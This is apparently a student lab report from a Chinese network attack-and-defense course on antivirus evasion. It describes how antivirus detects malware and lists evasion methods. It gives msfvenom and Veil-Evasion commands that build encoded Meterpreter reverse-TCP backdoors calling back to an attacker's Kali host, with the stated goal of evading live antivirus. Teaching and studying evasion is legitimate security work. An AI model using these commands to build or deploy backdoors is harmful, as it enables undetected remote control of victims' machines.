2017-2018-2 20179215《网络攻防实践》第十二周做业

2017-2018-2 20179215 《网络攻防实践》 第十二周做业 免杀技术

1、实验内容

（1）理解免杀技术原理

（2）正确使用msf编码器，veil-evasion，本身利用shellcode编程等免杀工具或技巧；

（3）经过组合应用各类技术实现恶意代码免杀

（4）用另外一电脑实测，在杀软开启的状况下，可运行并回连成功，注明电脑的杀软名称与版本

1.基础问题回答

（1）杀软是如何检测出恶意代码的？

• 正常行为分析法：正常行为分析常被应用于异常检测之中，是指对程序的正常行为轮廓进行分析和表示，为程序创建一个安全行为库，当被监测程序的实际行为与其安全行为库中的正常行为不一致或存在必定差别时，则可能为恶意代码

• 特征检测法：系统分析获取恶意代码一般具备明显特征码，当检测到代码含有特征码则可能为恶意代码

（2）免杀是作什么？

免杀是不会被杀毒软件软件杀掉的病毒或木马 是病毒的制做人 为了避免让病毒被识别出来 经过钻杀毒软件漏洞或者将病毒假装成正常程序的办法 来逃避杀毒软件的查杀。

（3）免杀的基本方法有哪些？

• 修改特征码：对恶意代码的特征码进行修改，好比添加一些指令，让杀软没法识别其是否为恶意代码

• 加花：经过添加加花指令（一些垃圾指令，相似加1减1之类的无用语句）让杀毒软件检测不到特征码。加花能够分为加区加花和去头加花

• 加壳：给原程序加上一段保护程序，有保护和加密功能，运行加壳后的文件先运行壳再运行真实文件，从而起到保护做用

2、实验过程

正确使用msf编码器，msfvenom生成如jar之类的其余文件，veil-evasion，本身利用shellcode编程等免杀工具或技巧。将文件传至http://www.virscan.org/进行检测

1.msf用编码器生成执行文件

（1）Kali输入命令

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=kali的IP LPORT=5324端口号 -f exe >本身起后门名字.exe

（2）将该程序上传到virscan扫描

文件信息：

扫描结果：

2.用Veil-Evasion生成可执行文件

（1）在Kali中安装veil，sudo apt-get install veil

（2）在Kali的终端中启动Veil-Evasion

命令行中输入veil，后在veil中输入命令use evasion

依次输入以下命令生成你的可执行文件：

use python/meterpreter/rev_tcp.py（设置payload）

set LHOST Kali的IP（设置反弹链接IP）

set LPORT 端口号（设置反弹端口）

generate 可执行文件名

（输出有错误！）

3.利用shellcode编程实现免杀

• 首先，在Kali上使用命令生成一个c语言格式的Shellcode数组。

• 编译运行产生a.out文件

• 扫描文件